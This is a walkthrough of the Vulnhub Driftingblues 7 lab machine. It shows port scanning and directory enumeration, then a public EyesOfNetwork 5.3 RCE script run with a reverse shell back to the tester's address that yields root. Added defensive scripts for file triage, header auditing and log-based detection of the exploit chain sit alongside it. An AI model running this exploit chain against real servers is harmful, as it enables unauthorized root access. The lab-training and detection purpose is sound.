Vulnhub Driftingblues 7 Walkthrough

Driftingblues 7

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.66.0/16   |   Screen View: Unique Hosts                                                                                                                                                             
                                                                                                                                                                                                                                 
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.100  08:00:27:87:54:c9      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.196  08:00:27:84:f0:64      2     120  PCS Systemtechnik GmbH              

Using Kali Linux's netdiscover tool, the target host is identified as 192.168.56.196 (the other two addresses are the host-only adapter and VirtualBox's DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.196 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 06:36 EST
Nmap scan report for localhost (192.168.56.196)
Host is up (0.00013s latency).
Not shown: 65527 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
|   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
|_  256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
66/tcp   open  http            SimpleHTTPServer 0.6 (Python 2.7.5)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.5
|_http-title: Scalable Cost Effective Cloud Storage for Developers
80/tcp   open  http            Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
|_http-title: Did not follow redirect to https://localhost/
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
111/tcp  open  rpcbind         2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
443/tcp  open  ssl/http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-04-03T14:37:22
|_Not valid after:  2022-04-03T14:37:22
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
2403/tcp open  taskmaster2000?
3306/tcp open  mysql           MariaDB (unauthorized)
8086/tcp open  http            InfluxDB http admin 1.7.9
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 08:00:27:84:F0:64 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.21 seconds

Get Access

Port 66

Let's start with port 66, which serves a static page.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ gobuster dir -u http://192.168.56.196:66  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.196:66
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/20 06:43:51 Starting gobuster in directory enumeration mode
===============================================================
/index_files          (Status: 301) [Size: 0] [--> /index_files/]
/eon                  (Status: 200) [Size: 248]
Progress: 220560 / 220561 (100.00%)
===============================================================
2022/11/20 06:46:18 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:66/index_files/
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /index_files/</title>
<body>
<h2>Directory listing for /index_files/</h2>
<hr>
<ul>
<li><a href="b2-customer-logos.jpg">b2-customer-logos.jpg</a>
<li><a href="b2_nav.css">b2_nav.css</a>
<li><a href="backblaze-logo.webp">backblaze-logo.webp</a>
<li><a href="best-online-backup-service2.css">best-online-backup-service2.css</a>
<li><a href="bootstrap.css">bootstrap.css</a>
<li><a href="bootstrap.js">bootstrap.js</a>
<li><a href="conversion.js">conversion.js</a>
<li><a href="counter.css">counter.css</a>
<li><a href="counter.js">counter.js</a>
<li><a href="css.css">css.css</a>
<li><a href="detectmobiledevice.js">detectmobiledevice.js</a>
<li><a href="dynamic-variables.js">dynamic-variables.js</a>
<li><a href="event-id.js">event-id.js</a>
<li><a href="gtm.js">gtm.js</a>
<li><a href="home-illustration-using-single-cloud.jpg">home-illustration-using-single-cloud.jpg</a>
<li><a href="home-two-cloud-cabinet.webp">home-two-cloud-cabinet.webp</a>
<li><a href="home-two-cloud-copy.webp">home-two-cloud-copy.webp</a>
<li><a href="home-two-mobile.webp">home-two-mobile.webp</a>
<li><a href="home-two-movie.webp">home-two-movie.webp</a>
<li><a href="home.css">home.css</a>
<li><a href="jquery-1.js">jquery-1.js</a>
<li><a href="jquery.js">jquery.js</a>
<li><a href="main.css">main.css</a>
<li><a href="main.js">main.js</a>
<li><a href="nav.js">nav.js</a>
<li><a href="on_download_20181107.js">on_download_20181107.js</a>
<li><a href="page-id.js">page-id.js</a>
<li><a href="plang_english_a.webp">plang_english_a.webp</a>
</ul>
<hr>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ mv ~/Downloads/eon .    
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ ls
eon  nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ cat eon                                   
UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU
Rw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA
AABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA
AQBbAAAARgAAAAAA

I don't know what encoding the eon file uses, so I'll set it aside for now.
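The blob can be triaged offline without guessing at it: its first characters, `UEsDBBQ`, are the base64 encoding of `PK\x03\x04`, the ZIP local-file-header signature. The script below is an added example, not part of the original post. It decodes the base64 text exactly as the `cat eon` output shows it, identifies the container by its magic bytes and, for a ZIP, lists the entries from the archive headers alone, reading the encryption flag (general-purpose flag bit 0) so that it knows when to stop: `zipfile` refuses to read such an entry without its password, and the script does not try one.

```python
import base64
import io
import zipfile

# The text served at /eon, copied from the page exactly as the cat output shows it.
EON_B64 = """\
UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU
Rw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA
AABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA
AQBbAAAARgAAAAAA
"""

# A few common container signatures; extend as needed.
MAGICS = [
    (b"PK\x03\x04", "zip"),
    (b"\x1f\x8b", "gzip"),
    (b"\x7fELF", "elf"),
    (b"%PDF", "pdf"),
]


def identify(data: bytes) -> str:
    """Name the container by its leading magic bytes, or 'unknown'."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "unknown"


def triage(b64_text: str) -> dict:
    """Decode base64 text and, for a ZIP, list entries from the headers only (no extraction)."""
    raw = base64.b64decode(b64_text)  # non-alphabet characters such as newlines are skipped
    report = {"bytes": len(raw), "kind": identify(raw), "entries": []}
    if report["kind"] != "zip":
        return report
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        for info in zf.infolist():
            report["entries"].append({
                "name": info.filename,
                "size": info.file_size,
                "stored_size": info.compress_size,
                "method": info.compress_type,           # 0 = stored, 8 = deflate
                "encrypted": bool(info.flag_bits & 1),  # general-purpose flag bit 0
                "crc32": f"{info.CRC:08x}",
                "modified": "%04d-%02d-%02d %02d:%02d:%02d" % info.date_time,
            })
    return report


def readable_without_password(b64_text: str, name: str) -> bool:
    """True if the entry can be read as-is; an encrypted entry makes zipfile raise RuntimeError."""
    raw = base64.b64decode(b64_text)
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        try:
            zf.read(name)
            return True
        except RuntimeError:
            return False


if __name__ == "__main__":
    for key, value in triage(EON_B64).items():
        print(f"{key}: {value}")
    print("readable without password:", readable_without_password(EON_B64, "creds.txt"))
```

The headers show a single stored (uncompressed) entry, `creds.txt`, 19 bytes long with a 12-byte encryption prefix, protected by traditional PKZIP encryption. The entry's modification date is the same day as the server certificate's `Not valid before` date from the Nmap output, which is consistent with the archive having been dropped on the box when it was built.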

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ gobuster dir -u http://192.168.56.196:66  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.196:66
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/11/20 06:48:04 Starting gobuster in directory enumeration mode
===============================================================
/flag.txt             (Status: 200) [Size: 1823]
/index_files          (Status: 301) [Size: 0] [--> /index_files/]
/eon                  (Status: 200) [Size: 248]

Scanning port 66 for files with gobuster, this time with extensions, unexpectedly turns up a user flag.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:66/flag.txt
flag 1/1
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

Port 80

Visiting port 80 in a browser redirects automatically to 443, which returns a login page.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ nikto -h https://192.168.56.196   
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.196
+ Target Hostname:    192.168.56.196
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost/emailAddress=root@localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost/emailAddress=root@localhost
+ Start Time:         2022-11-20 07:02:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
+ Retrieved x-powered-by header: PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: ./module/dashboard_view/index.php
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/1.0.2k-fips appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Perl/v5.16.3 appears to be outdated (current is at least v5.20.0)
+ Hostname '192.168.56.196' does not match certificate's names: localhost
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8724 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2022-11-20 07:03:16 (GMT-5) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (mod_perl/2.0.11) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


Gobuster did not turn up any valuable directories or files either.
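The Nikto output above is mostly a list of response headers the server does not send (X-Frame-Options, Strict-Transport-Security, X-Content-Type-Options) next to version strings it does send (Server, X-Powered-By). The following script is an added example, not part of the original post: it parses a raw HTTP response head and audits it for exactly those points. The two response texts are constructed from the Nikto findings, not captured from the target, and the header values in EXPECTED are illustrative defaults.

```python
import re

# Hardening headers Nikto reported missing on this host, with an example value
# a defender would set. CSP is added here because it is the header that actually
# restricts framing and script sources (values are examples, not from the page).
EXPECTED = {
    "strict-transport-security": "max-age=31536000; includeSubDomains",
    "x-frame-options": "DENY",
    "x-content-type-options": "nosniff",
    "content-security-policy": "default-src 'self'; frame-ancestors 'none'",
}
# Headers that advertise the software stack; flagged only when they carry a version number.
VERSION_LEAKS = ("server", "x-powered-by")

MIN_HSTS_AGE = 180 * 24 * 3600  # 180 days


def parse_head(raw: str):
    """Split a raw HTTP response into (status_code, {lower-case header: value}); body ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit(headers: dict) -> dict:
    """Report missing hardening headers, version leaks and weak settings."""
    findings = {
        "missing": [h for h in EXPECTED if h not in headers],
        "leaks": {h: headers[h] for h in VERSION_LEAKS
                  if h in headers and re.search(r"\d", headers[h])},
        "weak": [],
    }
    hsts = headers.get("strict-transport-security", "")
    age = re.search(r"max-age=(\d+)", hsts)
    if hsts and (age is None or int(age.group(1)) < MIN_HSTS_AGE):
        findings["weak"].append("strict-transport-security: max-age below 180 days")
    if headers.get("x-frame-options", "").upper() not in ("", "DENY", "SAMEORIGIN"):
        findings["weak"].append("x-frame-options: unsupported value")
    return findings


def audit_raw(raw: str) -> dict:
    return audit(parse_head(raw)[1])


# Constructed response modelled on the Nikto findings: stack advertised, no hardening headers.
WEAK_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3\r\n"
    "X-Powered-By: PHP/5.4.16\r\n"
    "Location: ./module/dashboard_view/index.php\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)

# The same response after hardening (constructed; values are the EXPECTED examples).
HARDENED_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Location: ./module/dashboard_view/index.php\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print("weak:", audit_raw(WEAK_RESPONSE))
    print("hardened:", audit_raw(HARDENED_RESPONSE))
```

On Apache the hardened set corresponds to `Header always set ...` lines from mod_headers, `ServerTokens Prod` for the Server banner, `expose_php = Off` in php.ini for X-Powered-By, and `TraceEnable off` for the TRACE finding Nikto also reported.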

But we already know the CMS is EyesOfNetwork, and it does have known vulnerabilities:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ searchsploit eyesofnetwork   
------------------------------------------------------------------- ---------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------
EyesOfNetwork (EON) 5.0 - Remote Code Execution                    | php/webapps/41746.md
EyesOfNetwork (EON) 5.0 - SQL Injection                            | php/webapps/41747.md
EyesOfNetwork (EON) 5.1 - SQL Injection                            | php/webapps/41774.py
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)| multiple/remote/48169.rb
EyesOfNetwork 5.1 - Authenticated Remote Command Execution         | php/webapps/47280.py
EyesOfNetwork 5.3 - File Upload Remote Code Execution              | multiple/webapps/49432.sh
EyesOfNetwork 5.3 - LFI                                            | multiple/webapps/49404.txt
EyesOfNetwork 5.3 - RCE & PrivEsc                                  | multiple/webapps/49402.txt
EyesOfNetwork 5.3 - Remote Code Execution                          | php/webapps/48025.txt
------------------------------------------------------------------- ---------------------------

Port 2403

Not accessible.

Port 8086

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:8086/          
404 page not found

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ gobuster dir -u http://192.168.56.196:8086  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                        
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.196:8086
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/20 07:13:48 Starting gobuster in directory enumeration mode
===============================================================
/status               (Status: 204) [Size: 0]
/query                (Status: 400) [Size: 45]
/write                (Status: 405) [Size: 19]
/ping                 (Status: 204) [Size: 0]
/metrics              (Status: 200) [Size: 5517]
Progress: 218761 / 220561 (99.18%)
===============================================================
2022/11/20 07:14:08 Finished
===============================================================

Visiting /ping returns an empty response. Maybe it takes a parameter? Let's fuzz it.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ wfuzz -c -u http://192.168.56.196:8086/ping?FUZZ=127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.196:8086/ping?FUZZ=127.0.0.1
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                            
=====================================================================


Total time: 121.7918
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 1810.958

Nothing found!

But /query is more interesting:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:8086/query?q=show%20databases;
{"results":[{"statement_id":0,"series":[{"name":"databases","columns":["name"],"values":[["nagflux"],["_internal"]]}]}]}

Nothing very valuable, though, only a username.
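The security-relevant point of that response is not its content but that it came back at all: InfluxDB 1.x answers `/query` without credentials when HTTP authentication is off (`auth-enabled = false` under `[http]` in influxdb.conf, the 1.x default); with it on, the same request gets a 401. The script below is an added example, not from the original post: a parser for the `results` / `series` / `columns` / `values` structure InfluxDB returns, generalised to tagged series and per-statement errors. The SHOW DATABASES body is the one from the curl above; the other two bodies are constructed.

```python
import json

# Body returned by the curl to /query?q=show databases above, copied from the page.
SHOW_DATABASES = (
    '{"results":[{"statement_id":0,"series":[{"name":"databases",'
    '"columns":["name"],"values":[["nagflux"],["_internal"]]}]}]}'
)

# Constructed responses (not captured from the target) for the other shapes the
# endpoint produces: a series carrying tags, and a statement that failed.
TAGGED = (
    '{"results":[{"statement_id":0,"series":[{"name":"cpu","tags":{"host":"eon"},'
    '"columns":["time","value"],"values":[["2022-11-20T12:00:00Z",0.5],'
    '["2022-11-20T12:00:10Z",0.7]]}]}]}'
)
FAILED = '{"results":[{"statement_id":0,"error":"database not found: nosuchdb"}]}'


def flatten(payload: str):
    """Return (rows, errors) from an InfluxDB 1.x /query JSON body.

    Each row is a dict holding the series name under '_series', the series
    tags (if any) and then one value per column; errors is a list of
    (statement_id, message) for statements that did not produce a series.
    """
    doc = json.loads(payload)
    rows, errors = [], []
    for stmt in doc.get("results", []):
        if "error" in stmt:
            errors.append((stmt.get("statement_id"), stmt["error"]))
            continue
        for series in stmt.get("series", []):
            cols = series["columns"]
            tags = series.get("tags", {})
            for vals in series.get("values", []):
                row = {"_series": series.get("name"), **tags}
                row.update(zip(cols, vals))
                rows.append(row)
    return rows, errors


def database_names(payload: str) -> list:
    """Names from a SHOW DATABASES response; '_internal' is InfluxDB's own monitoring store."""
    rows, _ = flatten(payload)
    return [r["name"] for r in rows if r["_series"] == "databases"]


if __name__ == "__main__":
    print(database_names(SHOW_DATABASES))
    print(flatten(TAGGED))
    print(flatten(FAILED))
```

The `nagflux` database is the one the EyesOfNetwork stack writes Nagios performance data into; `_internal` is present on every 1.x instance and is a quick tell that the endpoint is an unprotected InfluxDB rather than some other JSON API.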

Next, focus on ports 80 and 443: find the CMS version and a matching exploit script.

Search for an EyesOfNetwork 5.1 to 5.3 exploit:

Link:

https://github.com/h4knet/eonrce

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7/eonrce]
└─$ python eonrce.py https://192.168.56.196 -ip 192.168.56.137 -port 5555
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE                                                       |
| 03/2020 - v1.1 - Clément Billac - Twitter: @h4knet                          |
+-----------------------------------------------------------------------------+

[*] Reverse shell: 192.168.56.137:5555
[*] User to create: h4ker:net_was_here
[*] EyesOfNetwork login page found
[*] EyesOfNetwork API page found. API version: 2.4.2
[+] Admin user key obtained: b67dfa1ef76596bbe3813e5b209578873f2053bab2df4d98000f595508fbd9ef
[+] New user h4ker successfully created. ID:2
[+] Successfully authenticated
[+] Discovery job successfully created with ID: 1
[*]  Spawning netcat listener: 
listening on [192.168.56.137] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.196] 54576
sh: no job control in this shell
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# cat /root
cat /root
cat: /root: Is a directory
sh-4.2# ls -alh
ls -alh
total 32K
drwxr-xr-x.  3 nagios root 4.0K Apr  3  2021 .
drwxr-xr-x. 14 nagios root 4.0K Apr  3  2021 ..
-rw-r--r--.  1 nagios root 5.6K Dec 18  2019 autodiscover.php
-rw-r--r--.  1 nagios root 8.2K Dec 18  2019 classes.inc.php
drwxr-xr-x.  3 nagios root 4.0K Apr  3  2021 engines
sh-4.2# 

That's root straight away!
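The exploit output above spells out the request sequence it relies on: the admin API key is obtained, a user is created, the client authenticates with it, and a discovery job is created; the shell that comes back is already uid 0, so the job runs as root and there is no privilege boundary left to cross. That ordered sequence from one client in a short window is what a defender can look for. The script below is an added detection example, not part of the post and not from the eonrce tool: it groups Apache combined-log lines by client address and alerts when one address completes the chain within five minutes. The endpoint paths in STAGES are placeholders assumed for this example (substitute the ones your EyesOfNetwork version exposes) and the log lines are constructed, not taken from the target.

```python
import re
from datetime import datetime, timedelta

# Apache combined-log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Stages the exploit output reports, in the order it performs them. The paths
# are placeholders assumed for this example, not the page's or the exploit's.
STAGES = [
    ("api_key", "/eonapi/getApiKey"),        # placeholder path
    ("create_user", "/eonapi/createUser"),   # placeholder path
    ("discovery", "/eonapi/discoverHosts"),  # placeholder path
]
WINDOW = timedelta(minutes=5)


def parse_line(line: str):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def stage_of(path: str):
    for name, prefix in STAGES:
        if path.startswith(prefix):
            return name
    return None


def detect_chain(lines):
    """Return [(ip, first_ts, last_ts)] for clients that hit every stage, in order,
    with non-error responses, inside WINDOW of their api_key request."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] >= 400:
            continue
        stage = stage_of(rec["path"])
        if stage is not None:
            per_ip.setdefault(rec["ip"], []).append((rec["ts"], stage))

    order = [name for name, _ in STAGES]
    alerts = []
    for ip, events in per_ip.items():
        events.sort()
        for i, (t0, s0) in enumerate(events):
            if s0 != order[0]:
                continue
            want, last = 1, t0
            for t, s in events[i + 1:]:
                if t - t0 > WINDOW:
                    break
                if s == order[want]:
                    want, last = want + 1, t
                    if want == len(order):
                        alerts.append((ip, t0, last))
                        break
            if alerts and alerts[-1][0] == ip:
                break  # one alert per client is enough
    return alerts


# Constructed log lines (not from the target): an administrator using the UI, a
# client that only touches the key endpoint, and a client completing the chain
# from the address the walkthrough's listener used.
SAMPLE_LOG = """\
192.168.56.50 - - [20/Nov/2022:07:28:10 -0500] "GET /login.php HTTP/1.1" 200 2140
192.168.56.50 - - [20/Nov/2022:07:28:25 -0500] "POST /login.php HTTP/1.1" 302 0
192.168.56.50 - - [20/Nov/2022:07:28:26 -0500] "GET /module/dashboard_view/index.php HTTP/1.1" 200 9311
192.168.56.77 - - [20/Nov/2022:07:29:02 -0500] "GET /eonapi/getApiKey HTTP/1.1" 200 118
192.168.56.137 - - [20/Nov/2022:07:30:01 -0500] "GET /login.php HTTP/1.1" 200 2140
192.168.56.137 - - [20/Nov/2022:07:30:02 -0500] "GET /eonapi/getApiKey HTTP/1.1" 200 118
192.168.56.137 - - [20/Nov/2022:07:30:03 -0500] "POST /eonapi/createUser HTTP/1.1" 200 54
192.168.56.137 - - [20/Nov/2022:07:30:05 -0500] "POST /eonapi/discoverHosts HTTP/1.1" 200 41
""".splitlines()

if __name__ == "__main__":
    for ip, first, last in detect_chain(SAMPLE_LOG):
        print(f"ALERT {ip}: API key -> user creation -> discovery between {first} and {last}")
```

A single hit on the key endpoint (192.168.56.77 above) is not enough to alert on, since legitimate integrations fetch keys too; the full ordered chain from one address is the signal. The other lesson of the `id` output is that the discovery job should never have been running as root in the first place; running it as the `nagios` user that owns the application files would have turned this into a much smaller incident.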

Posted 2022-11-20 20:57 by Jason_huawen